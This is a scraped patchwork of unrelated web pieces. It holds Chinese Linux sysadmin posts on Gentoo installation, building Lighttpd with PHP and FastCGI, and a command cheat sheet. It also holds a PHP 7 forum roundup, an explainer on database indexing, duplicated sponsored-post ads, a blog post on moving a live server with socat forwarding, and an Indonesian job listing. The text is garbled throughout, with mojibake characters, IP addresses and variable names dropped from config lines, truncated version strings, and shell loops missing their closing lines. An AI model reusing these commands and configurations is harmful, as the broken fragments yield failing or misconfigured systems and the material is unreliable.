/dev/sda3 none swap sw 0 0


echo ‘config_eth0=( “″ )’ >> /etc/conf.d/net
echo ‘routes_eth0=( “default via″ )’ >> /etc/conf.d/net


rc-update add sshd default


cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
nano -w /etc/conf.d/clock

设置 root 密码:

passwd root


umount /mnt/gentoo/dev /mnt/gentoo/proc /mnt/gentoo/boot /mnt/gentoo



附 make.conf

CFLAGS="-march=native -O2 -pipe -fomit-frame-pointer -mmmx -msse -msse2"
USE="jpeg ssl nls unicode cjk zh nptl nptlonly mmx sse sse2 -X -gtk -gnome \
     sasl maildir imap libwww mysql xml sockets vhosts snmp \
     -lvm -lvm1 -kde -qt -cups -alsa -apache
="http://mirrors.163.com/gentoo ftp://gg3.net/pub/linux/gentoo"


="i386 x86_64"
="i386 x86_64"

参考文档  http://www.gentoo.org/doc/zh_cn/handbook/handbook-amd64.xml


Alpha 2011-06-28 16:03 发表评论


Lighttpd 作为新一代的web server,以小巧(不到1M的大小)、快速而著称,因为服务器上安装了rails、java,并以lighttpd为前端代理服务器,不想再部署apache了,所以直接使用lighttpd来部署,顺便看一下性能如何。

本文主要介绍在CentOS下,配置一套用lighttp作为web server的php环境

· 安装Lighttpd
安装前先检查pcre是否安装,需要pcre和pcre-devel两个包。 用yum search pcre\*检查,如果都是installed就是都安装了。否则安装缺少的包。

yum install pcre-devel


tar xzvf lighttpd-1.4.23.tar.gz
cd lighttpd-1.4.23
./configure –prefix=/usr/local/lighttpd


make && make install


cp doc/sysconfig.lighttpd /etc/sysconfig/lighttpd
mkdir /etc/lighttpd
cp doc/lighttpd.conf /etc/lighttpd/lighttpd.conf


cp doc/rc.lighttpd.redhat /etc/init.d/lighttpd


cp doc/rc.lighttpd /etc/init.d/lighttpd






/etc/init.d/lighttpd start
/etc/init.d/lighttpd stop
/etc/init.d/lighttpd restart


chkconfig lighttpd on




2)server.document-root, server.error-log,accesslog.filename需要指定相应的目录

server.username = “nobody”
server.groupname = “nobody”
从安全角度来说,不建议用root权限运行web server,可以自行指定普通用户权限。

compress.cache-dir = “/tmp/lighttpd/cache/compress”
compress.filetype = (“text/plain”, “text/html”,”text/javascript”,”text/css”)

5)配置ruby on rails


$HTTP["host"] == "www.xxx.com" {
 server.document-root = "/yourrails/public"
 server.error-handler-404 = "/dispatch.fcgi"
 fastcgi.server = (".fcgi" =>
    ("localhost" =>
      ("min-procs" => 10,
       "max-procs" => 10,
       "socket" => "/tmp/lighttpd/socket/rails.socket",
       "bin-path" => "/yourrails/public/dispatch.fcgi",
       "bin-environment" => ("RAILS_ENV" => "production")

即由lighttpd启动10个FCGI进程,lighttpd和FCGI之间使用本机Unix Socket通信。

$HTTP[”host”] =~ “(^|\.)abc\.com” {



$HTTP["host"] =~ “www.domain.cn” {
proxy.server = ( “” => ( “localhost” => ( “host”=> “″, “port”=> 8080 ) ) )

则www.domain.cn为主机的网址都交给tomcat处理,tomcat的端口号为8080. 在tomcat的虚拟主机中,需要捕获www.domain.cn这个主机名,设置这个虚拟主机。这里的host都是跟tomcat里面的虚拟主机对应的。

· 安装支持fastcgi的PHP

wget http://curl.cs.pu.edu.tw/download/curl-7.19.5.tar.bz2


tar xvjf curl-7.19.5.tar.bz2
cd curl-7.19.5
./configure –prefix=/usr/local/curl


wget ftp://ftp.ntu.edu.tw/pub/gnu/gnu/gettext/gettext-0.17.tar.gz
tar xvzf gettext-0.17.tar.gz
cd gettext-0.17
./configure –prefix=/usr/local/gettext


wget http://kent.dl.sourceforge.net/sourceforge/libpng/zlib-1.2.3.tar.gz
tar xvzf zlib-1.2.3.tar.gz
cd zlib-1.2.3
./configure –prefix=/usr/local/zlib
make && make install


wget http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.9.tar.gz
tar xvzf libpng-1.2.9.tar.gz
cd libpng-1.2.9
./configure –prefix=/usr/local/libpng
make && make install


wget http://www.ijg.org/files/jpegsrc.v6b.tar.gz
tar xvzf jpegsrc.v6b.tar.gz
cd jpeg-6b/
./configure –prefix=/usr/local/jpeg6


mkdir /usr/local/jpeg6/bin
mkdir -p /usr/local/jpeg6/bin
mkdir -p /usr/local/jpeg6/man/man1
mkdir -p /usr/local/jpeg6/lib
mkdir -p /usr/local/jpeg6/include
make install-lib
make install


wget http://download.savannah.gnu.org/releases/freetype/freetype-2.3.9.tar.gz
tar xvzf freetype-2.3.9.tar.gz
cd freetype-2.3.9
./configure –prefix=/usr/local/freetype2


wget http://www.libgd.org/releases/gd-2.0.35.tar.gz
tar xvzf gd-2.0.35.tar.gz
cd gd-2.0.35
./configure –prefix=/usr/local/gd2 –with-zlib=/usr/local/zlib/ –with-png=/usr/local/libpng/ –with-jpeg=/usr/local/jpeg6/ –with-freetype=/usr/local/freetype2/
make install


tar xvzf php-5.2.10.tar.gz
cd php-5.2.10
./configure –prefix=/usr/local/php –with-mysql=/usr/local/mysql –with-pdo-mysql=/usr/local/mysql –with-jpeg-dir=/usr/local/jpeg6/ –with-png-dir=/usr/local/libpng/ –with-gd=/usr/local/gd2/ –with-freetype-dir=/usr/local/freetype2/  –with-zlib-dir=/usr/local/zlib –with-curl=/usr/local/curl –with-gettext=/usr/local/gettext –enable-fastcgi –enable-zend-multibyte –with-config-file-path=/etc –enable-discard-path –enable-force-cgi-redirect
php.ini-dist /etc/php.ini


可以使用php -m查看你安装的模块


wget http://bart.eaccelerator.net/source/
tar xjvf eaccelerator-
cd eaccelerator-
export PHP_PREFIX="/usr/local/php"
./configure –enable-eaccelerator=shared –with-php-config=$PHP_PREFIX/bin/php-config

vim /etc/php.ini

cgi.fix_pathinfo = 1




$ php -v
PHP 5.2.10 (cli) (built: Jun 20 2009 23:32:09)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
    with eAccelerator v0.9.5.3, Copyright (c) 2004-2006 eAccelerator, by eAccelerator

vim /etc/lighttpd/lighttpd.conf

fastcgi.server             = ( ".php" =>
                               ( "localhost" =>
                                   "socket" => "/tmp/php-fastcgi.socket",
                                   "bin-path" => "/usr/local/php/bin/php-cgi"


/etc/init.d/lighttpd restart



Alpha 2011-06-22 23:24 发表评论



解压:tar jxvf FileName.tar.bz2 åŽ‹ç¼©ï¼štar jcvf FileName.tar.bz2 DirName

解压1:gunzip FileName.gz   解压2:gzip -d FileName.gz åŽ‹ç¼©ï¼šgzip FileName
和 .tgz
解压:tar zxvf FileName.tar.gz åŽ‹ç¼©ï¼štar zcvf FileName.tar.gz DirName

解包:rpm2cpio FileName.rpm | cpio -div
解包:ar p FileName.deb data.tar.gz | tar zxf -


scp root@* /opt/test ,输入远程机器密码后完成

scp -P 3588  root@* /opt/test èµ°ç‰¹æ®Šç«¯å£å·


scp /opt/test/*  root@ ,输入远程机器密码后完成

使用方式 : chmod [-cfvR] [--help] [--version] mode file...

使用方式 :chown jessie:users file1.txt 

Mysql 初始化:chkconfig –add mysqld

正在使用的端口:netstat -ant

挂载USB: mount  /dev/sdc /mnt/usb

Rpm 安装: rpm –ivh filename


网络测试:curl -I http://www.job5156.com

改IP地址:ifconfig eth0 netmask

改网关:route add default gw   查看:route –n

改DNS:nano -w /etc/resolv.conf  

导出表结构:mysqldump -u root -p -d --add-drop-table dbName tableName > /opt/name.sql

导入表结构:mysql dbName < name.sql

修复Mysql表: mysqlrepair --auto-repair -F -r dbName  tableName

给mysql用户加账号权限: grant all on dbName.* to user@'%' identified by 'pwd'; FLUSH PRIVILEGES;

加字段:ALTER TABLE table_name ADD field_name field_type;

删字段:alter table t2 drop column c;

字段重命名:alter table t1 change a b integer;

表重命名:alter table t1 rename t2;

加索引:alter table tablename add index 索引名 (字段名1[,字段名2 …]);

删索引:alter table tablename drop index emp_name;

Alpha 2010-04-16 15:17 发表评论

          Back End Developer - PHP, MySQL, LAMP        

          On Our Radar: PHP 7 Controversy and Dependency Injection        

Over the past eight months, we've enjoyed bringing to you the latest and greatest updates from the world of web development. But we've also noticed that discussions among web professionals on our forums have not been receiving nearly enough exposure as they should.

To change things up a bit, we're going to start bringing to you items and information from those discussions that have caught our attention. Sometimes these discussions will be useful and interesting, and sometimes they may be challenging or insightful. Either way, they're likely to bring new information to light that you haven't come across before, and will help to provide insight and perspective on topics you're interested in.

So let's get started!

PHP 7 Controversy

The PHP 7 Revolution article brought on a vast amount of discussion in our forums. The article covered information on how PHP is skipping 5.7 and moving directly to PHP 7, that the new version will give us return types, and that the removal of PHP4-style constructors is certainly going to be a controversial change. Tony Marstron controversially pleaded: please don't break our language.

An excellent response from rrcatto:

"If a business needs to run a piece of code, to me this also implies actively maintaining it. ... If the language changes, code must also change. That is the only dev paradigm that makes sense, because progress is a good thing and we should not hinder it."

Continue reading %On Our Radar: PHP 7 Controversy and Dependency Injection%

          How does database indexing work        

A database index is a data structure that improves the speed of data retrieval operations on a database table at the cost of additional writes and storage space to maintain the index data structure. Indexes are used to quickly locate data without having to search every row in a database table every time a database table is accessed. Indexes can be created using one or more columns of a database table, providing the basis for both rapid random lookups and efficient access of ordered records.

An index is a copy of selected columns of data from a table that can be searched very efficiently that also includes a low-level disk block address or direct link to the complete row of data it was copied from. Some databases extend the power of indexing by letting developers create indexes on functions or expressions. For example, an index could be created on upper(last_name), which would only store the upper case versions of the last_name field in the index. Another option sometimes supported is the use of partial indices, where index entries are created only for those records that satisfy some conditional expression. A further aspect of flexibility is to permit indexing on user-defined functions, as well as expressions formed from an assortment of built-in functions.

Given that indexing is so important as your data set increases in size, let’s understand how does indexing works at a database agnostic level.

Why is it needed?

When data is stored on disk based storage devices, it is stored as blocks of data. These blocks are accessed in their entirety, making them the atomic disk access operation. Disk blocks are structured in much the same way as linked lists; both contain a section for data, a pointer to the location of the next node (or block), and both need not be stored contiguously.

Due to the fact that a number of records can only be sorted on one field, we can state that searching on a field that isn’t sorted requires a Linear Search which requires N/2 block accesses (on average), where N is the number of blocks that the table spans. If that field is a non-key field (i.e. doesn’t contain unique entries) then the entire table space must be searched at N block accesses.

Whereas with a sorted field, a Binary Search may be used, this has log2 N block accesses. Also since the data is sorted given a non-key field, the rest of the table doesn’t need to be searched for duplicate values, once a higher value is found. Thus the performance increase is substantial.

What is indexing?

Indexing is a way of sorting a number of records on multiple fields. Creating an index on a field in a table creates another data structure which holds the field value, and pointer to the record it relates to. This index structure is then sorted, allowing Binary Searches to be performed on it.

The downside to indexing is that these indexes require additional space on the disk, since the indexes are stored together in a table using the MyISAM engine, this file can quickly reach the size limits of the underlying file system if many fields within the same table are indexed.

How does it work?

Firstly, let’s outline a sample database table schema;

Field name       Data type      Size on disk
id (Primary key) Unsigned INT   4 bytes
firstName        Char(50)       50 bytes
lastName         Char(50)       50 bytes
emailAddress     Char(100)      100 bytes

Note: char was used in place of varchar to allow for an accurate size on disk value. This sample database contains five million rows, and is unindexed. The performance of several queries will now be analyzed. These are a query using the id (a sorted key field) and one using the firstName (a non-key unsorted field).

Example 1 - sorted vs unsorted fields

Given our sample database of r = 5,000,000 records of a fixed size giving a record length of R = 204 bytes and they are stored in a table using the MyISAM engine which is using the default block size B = 1,024 bytes. The blocking factor of the table would be bfr = (B/R) = 1024/204 = 5 records per disk block. The total number of blocks required to hold the table is N = (r/bfr) = 5000000/5 = 1,000,000 blocks.

A linear search on the id field would require an average of N/2 = 500,000 block accesses to find a value, given that the id field is a key field. But since the id field is also sorted, a binary search can be conducted requiring an average of log2 1000000 = 19.93 = 20 block accesses. Instantly we can see this is a drastic improvement.

Now the firstName field is neither sorted nor a key field, so a binary search is impossible, nor are the values unique, and thus the table will require searching to the end for an exact N = 1,000,000 block accesses. It is this situation that indexing aims to correct.

Given that an index record contains only the indexed field and a pointer to the original record, it stands to reason that it will be smaller than the multi-field record that it points to. So the index itself requires fewer disk blocks than the original table, which therefore requires fewer block accesses to iterate through. The schema for an index on the firstName field is outlined below;

Field name       Data type      Size on disk
firstName        Char(50)       50 bytes
(record pointer) Special        4 bytes

Note: Pointers in MySQL are 2, 3, 4 or 5 bytes in length depending on the size of the table.

Example 2 - indexing

Given our sample database of r = 5,000,000 records with an index record length of R = 54 bytes and using the default block size B = 1,024 bytes. The blocking factor of the index would be bfr = (B/R) = 1024/54 = 18 records per disk block. The total number of blocks required to hold the index is N = (r/bfr) = 5000000/18 = 277,778 blocks.

Now a search using the firstName field can utilise the index to increase performance. This allows for a binary search of the index with an average of log2 277778 = 18.08 = 19 block accesses. To find the address of the actual record, which requires a further block access to read, bringing the total to 19 + 1 = 20 block accesses, a far cry from the 1,000,000 block accesses required to find a firstName match in the non-indexed table.

When should it be used?

Given that creating an index requires additional disk space (277,778 blocks extra from the above example, a ~28% increase), and that too many indexes can cause issues arising from the file systems size limits, careful thought must be used to select the correct fields to index.

Since indexes are only used to speed up the searching for a matching field within the records, it stands to reason that indexing fields used only for output would be simply a waste of disk space and processing time when doing an insert or delete operation, and thus should be avoided. Also given the nature of a binary search, the cardinality or uniqueness of the data is important. Indexing on a field with a cardinality of 2 would split the data in half, whereas a cardinality of 1,000 would return approximately 1,000 records. With such a low cardinality the effectiveness is reduced to a linear sort, and the query optimizer will avoid using the index if the cardinality is less than 30% of the record number, effectively making the index a waste of space.

          Sponsored Post: Apple, Domino Data Lab, Etleap, Aerospike, Clubhouse, Stream, Scalyr, VividCortex, MemSQL, InMemory.Net, Zohocorp        

Who's Hiring? 

  • Apple is looking for passionate VoIP engineer with a strong technical background to transform our Voice platform to SIP. It will be an amazing journey with highly skilled, fast paced, and exciting team members. Lead and implement the engineering of Voice technologies in Apple’s Contact Center environment. The Contact Center Voice team provides the real time communication platform for customers’ interaction with Apple’s support and retail organizations. You will lead the global Voice, SIP, and network cross-functional engineers to develop world class customer experience. More details are available here.

  • Advertise your job here! 

Fun and Informative Events

  • Advertise your event here!

Cool Products and Services

  • Enterprise-Grade Database Architecture. The speed and enormous scale of today’s real-time, mission critical applications has exposed gaps in legacy database technologies. Read Building Enterprise-Grade Database Architecture for Mission-Critical, Real-Time Applications to learn: Challenges of supporting digital business applications or Systems of Engagement; Shortcomings of conventional databases; The emergence of enterprise-grade NoSQL databases; Use cases in financial services, AdTech, e-Commerce, online gaming & betting, payments & fraud, and telco; How Aerospike’s NoSQL database solution provides predictable performance, high availability and low total cost of ownership (TCO)

  • What engineering and IT leaders need to know about data science. As data science becomes more mature within an organization, you may be pulled into leading, enabling, and collaborating with data science teams. While there are similarities between data science and software engineering, well intentioned engineering leaders may make assumptions about data science that lead to avoidable conflict and unproductive workflows. Read the full guide to data science for Engineering and IT leaders.

  • Etleap provides a SaaS ETL tool that makes it easy to create and operate a Redshift data warehouse at a small fraction of the typical time and cost. It combines the ability to do deep transformations on large data sets with self-service usability, and no coding is required. Sign up for a 30-day free trial.

  • InMemory.Net provides a Dot Net native in memory database for analysing large amounts of data. It runs natively on .Net, and provides a native .Net, COM & ODBC apis for integration. It also has an easy to use language for importing data, and supports standard SQL for querying data. http://InMemory.Net

  • www.site24x7.com : Monitor End User Experience from a global monitoring network. 

  • Working on a software product? Clubhouse is a project management tool that helps software teams plan, build, and deploy their products with ease. Try it free today or learn why thousands of teams use Clubhouse as a Trello alternative or JIRA alternative.

  • Build, scale and personalize your news feeds and activity streams with getstream.io. Try the API now in this 5 minute interactive tutorial. Stream is free up to 3 million feed updates so it's easy to get started. Client libraries are available for Node, Ruby, Python, PHP, Go, Java and .NET. Stream is currently also hiring Devops and Python/Go developers in Amsterdam. More than 400 companies rely on Stream for their production feed infrastructure, this includes apps with 30 million users. With your help we'd like to ad a few zeros to that number. Check out the job opening on AngelList.

  • Scalyr is a lightning-fast log management and operational data platform.  It's a tool (actually, multiple tools) that your entire team will love.  Get visibility into your production issues without juggling multiple tabs and different services -- all of your logs, server metrics and alerts are in your browser and at your fingertips. .  Loved and used by teams at Codecademy, ReturnPath, Grab, and InsideSales. Learn more today or see why Scalyr is a great alternative to Splunk.

  • VividCortex is a SaaS database monitoring product that provides the best way for organizations to improve their database performance, efficiency, and uptime. Currently supporting MySQL, PostgreSQL, Redis, MongoDB, and Amazon Aurora database types, it's a secure, cloud-hosted platform that eliminates businesses' most critical visibility gap. VividCortex uses patented algorithms to analyze and surface relevant insights, so users can proactively fix future performance problems before they impact customers.

  • MemSQL provides a distributed in-memory database for high value data. It's designed to handle extreme data ingest and store the data for real-time, streaming and historical analysis using SQL. MemSQL also cost effectively supports both application and ad-hoc queries concurrently across all data. Start a free 30 day trial here: http://www.memsql.com/

  • Advertise your product or service here!

If you are interested in a sponsored post for an event, job, or product, please contact us for more information.

          Sponsored Post: Apple, Domino Data Lab, Etleap, Aerospike, Loupe, Clubhouse, Stream, Scalyr, VividCortex, MemSQL, InMemory.Net, Zohocorp        

Who's Hiring? 

  • Apple is looking for passionate VoIP engineer with a strong technical background to transform our Voice platform to SIP. It will be an amazing journey with highly skilled, fast paced, and exciting team members. Lead and implement the engineering of Voice technologies in Apple’s Contact Center environment. The Contact Center Voice team provides the real time communication platform for customers’ interaction with Apple’s support and retail organizations. You will lead the global Voice, SIP, and network cross-functional engineers to develop world class customer experience. More details are available here.

  • Advertise your job here! 

Fun and Informative Events

  • Advertise your event here!

Cool Products and Services

  • Enterprise-Grade Database Architecture. The speed and enormous scale of today’s real-time, mission critical applications has exposed gaps in legacy database technologies. Read Building Enterprise-Grade Database Architecture for Mission-Critical, Real-Time Applications to learn: Challenges of supporting digital business applications or Systems of Engagement; Shortcomings of conventional databases; The emergence of enterprise-grade NoSQL databases; Use cases in financial services, AdTech, e-Commerce, online gaming & betting, payments & fraud, and telco; How Aerospike’s NoSQL database solution provides predictable performance, high availability and low total cost of ownership (TCO)

  • What engineering and IT leaders need to know about data science. As data science becomes more mature within an organization, you may be pulled into leading, enabling, and collaborating with data science teams. While there are similarities between data science and software engineering, well intentioned engineering leaders may make assumptions about data science that lead to avoidable conflict and unproductive workflows. Read the full guide to data science for Engineering and IT leaders.

  • A note for .NET developers: You know the pain of troubleshooting errors with limited time, limited information, and limited tools. Log management, exception tracking, and monitoring solutions can help, but many of them treat the .NET platform as an afterthought. You should learn about Loupe...Loupe is a .NET logging and monitoring solution made for the .NET platform from day one. It helps you find and fix problems fast by tracking performance metrics, capturing errors in your .NET software, identifying which errors are causing the greatest impact, and pinpointing root causes. Learn more and try it free today.

  • Etleap provides a SaaS ETL tool that makes it easy to create and operate a Redshift data warehouse at a small fraction of the typical time and cost. It combines the ability to do deep transformations on large data sets with self-service usability, and no coding is required. Sign up for a 30-day free trial.

  • InMemory.Net provides a Dot Net native in memory database for analysing large amounts of data. It runs natively on .Net, and provides a native .Net, COM & ODBC apis for integration. It also has an easy to use language for importing data, and supports standard SQL for querying data. http://InMemory.Net

  • www.site24x7.com : Monitor End User Experience from a global monitoring network. 

  • Working on a software product? Clubhouse is a project management tool that helps software teams plan, build, and deploy their products with ease. Try it free today or learn why thousands of teams use Clubhouse as a Trello alternative or JIRA alternative.

  • Build, scale and personalize your news feeds and activity streams with getstream.io. Try the API now in this 5 minute interactive tutorial. Stream is free up to 3 million feed updates so it's easy to get started. Client libraries are available for Node, Ruby, Python, PHP, Go, Java and .NET. Stream is currently also hiring Devops and Python/Go developers in Amsterdam. More than 400 companies rely on Stream for their production feed infrastructure, this includes apps with 30 million users. With your help we'd like to ad a few zeros to that number. Check out the job opening on AngelList.

  • Scalyr is a lightning-fast log management and operational data platform.  It's a tool (actually, multiple tools) that your entire team will love.  Get visibility into your production issues without juggling multiple tabs and different services -- all of your logs, server metrics and alerts are in your browser and at your fingertips. .  Loved and used by teams at Codecademy, ReturnPath, Grab, and InsideSales. Learn more today or see why Scalyr is a great alternative to Splunk.

  • VividCortex is a SaaS database monitoring product that provides the best way for organizations to improve their database performance, efficiency, and uptime. Currently supporting MySQL, PostgreSQL, Redis, MongoDB, and Amazon Aurora database types, it's a secure, cloud-hosted platform that eliminates businesses' most critical visibility gap. VividCortex uses patented algorithms to analyze and surface relevant insights, so users can proactively fix future performance problems before they impact customers.

  • MemSQL provides a distributed in-memory database for high value data. It's designed to handle extreme data ingest and store the data for real-time, streaming and historical analysis using SQL. MemSQL also cost effectively supports both application and ad-hoc queries concurrently across all data. Start a free 30 day trial here: http://www.memsql.com/

  • Advertise your product or service here!

If you are interested in a sponsored post for an event, job, or product, please contact us for more information.

The Solution to Your Operational Diagnostics Woes

Scalyr gives you instant visibility of your production systems, helping you turn chaotic logs and system metrics into actionable data at interactive speeds. Don't be limited by the slow and narrow capabilities of traditional log monitoring tools. View and analyze all your logs and system metrics from multiple sources in one place. Get enterprise-grade functionality with sane pricing and insane performance. Learn more today

VividCortex Gives You Database Superpowers 

Database monitoring is hard, but VividCortex makes it easy. Modern apps run complex queries at large scales across distributed, diverse types of databases (e.g. document, relational, key-value). The “data tier” that these become is tremendously difficult to observe and measure as a whole. The result? Nobody knows exactly what’s happening across all those servers.

VividCortex lets you handle this complexity like a superhero. With VividCortex, you're able to inspect all databases and their workloads together from a bird's eye view, spotting problems and zooming down to individual queries and 1-second-resolution metrics in just two mouse clicks. With VividCortex, you gain a superset of system-monitoring tools that use only global metrics (such as status counters), offering deep, multi-dimensional slice-and-dice visibility into queries, I/O, and CPU, plus other key measurements of your system's work. VividCortex is smart, opinionated, and understands databases deeply, too: it knows about queries, EXPLAIN plans, SQL bugs, typical query performance, and more. It empowers you to find and solve problems that you can't even see with other types of monitoring systems, because they don’t measure what matters to the database.

Best of all, VividCortex isn’t just a DBA tool. Unlike traditional monitoring tools, VividCortex eliminates the walls between development and production -- anybody can benefit from VividCortex and be a superhero. With powerful tools like time-over-time comparison, developers gain immediate production visibility into databases with no need for access to the production servers. Our customers vouch for it: Problems are solved faster and they're solved before they ever reach production. As a bonus, DBAs no longer become the bottleneck for things like code reviews and troubleshooting in the database. 

Make your entire team into database superheros: deploy VividCortex today. It only takes a moment, and you’re guaranteed to immediately learn something you didn’t already know about your databases and their workload. 

If you are interested in a sponsored post for an event, job, or product, please contact us for more information.

          today's leftovers        

          Migrating a live server to another host with no downtime        

I have had a 1U server co-located for some time now at iWeb Technologies' datacenter in Montreal. So far I've had no issues and it did a wonderful job hosting websites & a few other VMs, but because of my concern for its aging hardware I wanted to migrate away before disaster struck.

Modern VPS offerings are a steal in terms of they performance they offer for the price, and Linode's 4096 plan caught my eye at a nice sweet spot. Backed by powerful CPUs and SSD storage, their VPS is blazingly fast and the only downside is I would lose some RAM and HDD-backed storage compared to my 1U server. The bandwidth provided wit the Linode was also a nice bump up from my previous 10Mbps, 500GB/mo traffic limit.

When CentOS 7 was released I took the opportunity to immediately start modernizing my CentOS 5 configuration and test its configuration. I wanted to ensure full continuity for client-facing services - other than a nice speed boost, I wanted clients to take no manual action on their end to reconfigure their devices or domains.

I also wanted to ensure zero downtime. As the DNS A records are being migrated, I didn't want emails coming in to the wrong server (or clients checking a stale inboxes until they started seeing the new mailserver IP). I can easily configure Postfix to relay all incoming mail on the CentOS 5 server to the IP of the CentOS 7 one to avoid any loss of emails, but there's still the issue that some end users might connect to the old server and get served their old IMAP inbox for some time.

So first things first, after developing a prototype VM that offered the same service set I went about buying a small Linode for a month to test the configuration some of my existing user data from my CentOS 5 server. MySQL was sufficiently easy to migrate over and Dovecot was able to preserve all UUIDs, so my inbox continued to sync seamlessly. Apache complained a bit when importing my virtual host configurations due to the new 2.4 syntax, but nothing a few sed commands couldn't fix. So with full continuity out of the way, I had to develop a strategy to handle zero downtime.

With some foresight and DNS TTL adjustments, we can get near zero downtime assuming all resolvers comply with your TTL. Simply set your TTL to 300 (5 minutes) a day or so before the migration occurs and as your old TTL expires, resolvers will see the new TTL and will not cache the IP for as long. Even with a short TTL, that's still up to 5 minutes of downtime and clients often do bad things... The IP might still be cached (e.g. at the ISP, router, OS, or browser) for longer. Ultimately, I'm the one that ends up looking bad in that scenario even though I have done what I can on the server side and have no ability to fix the broken clients.

To work around this, I discovered an incredibly handy tool socat that can make magic happen. socat routes data between sockets, network connections, files, pipes, you name it. Installing it is as easy as: yum install socat

A quick script later and we can forward all connections from the old host to the new host:


# Stop services on this host
for SERVICE in dovecot postfix httpd mysqld;do
  /sbin/service $SERVICE stop

# Some cleanup
rm /var/lib/mysql/mysql.sock

# Map the new server's MySQL to localhost:3307
# Assumes capability for password-less (e.g. pubkey) login
ssh $NEWIP -L 3307:localhost:3306 &
socat unix-listen:/var/lib/mysql/mysql.sock,fork,reuseaddr,unlink-early,unlink-close,user=mysql,group=mysql,mode=777 TCP:localhost:3307 &

# Map ports from each service to the new host
for PORT in 110 995 143 993 25 465 587 80 3306;do
  echo "Starting socat on port $PORT..."
  socat TCP-LISTEN:$PORT,fork TCP:${NEWIP}:${PORT} &
  sleep 1

And just like that, every connection made to the old server is immediately forwarded to the new one. This includes the MySQL socket (which is automatically used instead of a TCP connection a host of 'localhost' is passed to MySQL).

Note how we establish a SSH tunnel mapping a connection to localhost:3306 on the new server to port 3307 on the old one instead of simply forwarding the connection and socket to the new server - this is done so that if you have users who are permitted on 'localhost' only, they can still connect (forwarding the connection will deny access due to a connection from a unauthorized remote host).

Update: a friend has pointed out this video to me, if you thought 0 downtime was bad enough... These guys move a live server 7km through public transport without losing power or network!

          MODUL 2 : Mengelola Tabel pada MYSQL        
Lanjutan dari Modul 1 kita masuk ke Modul 2,,Semoga Bermanfaat ^_^ 1. Menambah Data Bagaimana kita menambah data dalam tabel ? Sebagai latihan kita, bangunlah sebuah database yang baru dengan nama ‘akademikdb’ mysql> CREATE database akademikdb; Kemudian aktifkan database tersebut mysql> USE akademikdb; Kemudian bangun sebuah tabel dengan nama ‘mahasiswa’ mysql> CREATE TABLE mahasiswa (nim […]
          MODUL 1 : Membangun Database dengan MYSQL        
MEMBANGUN DATABASE Bentuk umum perintah:  mysql-> CREATE DATABASE nama_database; Perintah ini digunakan untuk membangun sebuah database yang baru. Bila nama database tersebut telah digunakan sebelumnya, maka pesan error akan muncul. Sebagai latihan, bangunlah sebuah database akademik. mysql-> CREATE DATABASE akademik; BAGAIMANA MELIHAT DATABASE YANG SUDAH ADA?     mysql-> show databases; Dengan perintah diatas maka seluruh […]
          Lowongan Kerja Mobile Programmer        
Memahami dan mampu menggunakan mobile programming Cordova dengan plugin-pluginnnyaMemahami Android SDK dengan versioning dan library gradleMemahami HTML5 CSS/CSS3 JavaScriptMemahami mobile framework seperti Framework7 ionic dllMemahami web programming PHP Native maupun PHP Framework dan database MySQL ...

          (0-2 Yrs) HealthPlix Hiring For PHP, Jquery, Mysql web Developer @ Bangalore        
HealthPlix Technologies Pvt Ltd [www.healthplix.com] Openings For Freshers & Experienced : PHP, Jquery, Mysql web Developer @ Bangalore Job Description : Role: Software Developer Full stack web application developer Good programming skills with PHP, Jquery and MySQL Willing to work in start up environment Self motivated and willing to learn new technologies Salary:  INR 2,00,000 ...
          Lowongan Kerja Backend Developer        
Bachelor Degree in Informatics technology /Information System /any related fieldsHave experience in similar position or individual project is preferredFresh graduate are welcome to applySkill : PHP/CI MySQL HTML Javascript OOPWilling to work in Yogyakarta

          Lowongan Kerja Web Developer        
Fresh Graduate Are WelcomeFamiliar with OOP PHP CodeigneterJQueryAjaxBoostrapMYSQL Database will be an advantageMale/Female with strenght logic and nice communiccation skill with TEAM

          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
It works when you: * drop the foreign keys of the InnoDB tables * alter the InnoDB tables to MyISAM * stop mysql server * remove/move the ibdata* and ib_logfile* files * start mysql server (it should appear a new ibdata1 file with 10M filesize) * alter the previously altered tables back to InnoDB * create the foreign keys removed at the first step
          Lowongan Kerja Staff di PT. WINGS SURYA (WINGS GROUP)        

Batas pendaftaran: 31 Juli 2012
Penempatan kerja: Surabaya (Dan Sekitarnya)

W I N G S  G R O U P

  • D3 / S1 Akuntansi
  • Pria / Wanita
  • IPk min 2,9
  • Memiliki ketelitian yang baik
  • Bersedia dtempatkan di luar kota / pulau ( Khusus IA )
  • D3 / S1 Teknik Mesin & Elektro
  • Pria, IPK min 2,8
  • Bersedia kerka shift
  • Bersedia ditempatkan di Plant ( Gresik & Bangil - Pasuruan )
  • Diutamakan yang memeiliki pengalaman di Refinery  lebih kurang 2 thn
  • Memiliki ketahanan kerja yang baik
  • S1 Teknik Informatika, IPK min 2,8
  • Pria / Wanita
  • Menguasai C#, MySQL
  • Disukai bila menguasai SAP
  • Memiliki ketahan kerja yang baik
  • S1 Desain Grafis / Desain Komunikasi Visual, IPK min 2,8
  • Pria / Wanita
  • Menguasai Adobe Photoshop, Freehand, Adobe Illustrator
  • S1 Manajemen, IPK min 2,8
  • Pria, usia maks 30 thn
  • Diutamakan yang memeiliki pengalaman dibidangnya kurang lebih 1 thn
  • Bersedia ditugaskan di luar kota / pulau
  • Memiliki kemamouan komunikasi yang baik
  • Kreatif dan Fast learner
  • S1 Teknik Kimia / Pangan / Bioteknologi, IPK m in 2,8, Pria
  • Bersedia kerja shift
  • Bersedia ditempatkan di Plant ( Gresik )
  • Memiliki ketahanan kerja yang baik
  • S1 Teknik Industri / Informatika, IPK min 2,8 , usia maks 28 thn
  • Memiliki daya juang yang tinggi
  • Memiliki ketahanan kerja yang baik
  • Fast Learner
  • Penempatan di pabrik untuk PPIC
  • D3 / S1 Teknik ( Kecuali Teknik Kapal/Fisika/Matematika/Sipil )
  • Pria, IPK min 2,8
  • Bersedia kerja shift
  • Bersedia ditempatkan di Plant ( Gresik & Bangil-Pasuruan )
  • S1 Teknik Sipil, IPK min 2,8, Pria
  • Bersedia ditempatkan di Plant ( Gresik )
  • Memiliki ketahanan kerja yang baik
  • S1 Teknik Indyustri / Informatika, IPK min 3.00
  • Memiliki daya juang yang tinggi
  • Memiliki ketahan kerja yang baik
  • Menyukai pekerjaan di luar ruangan
  • fast learner
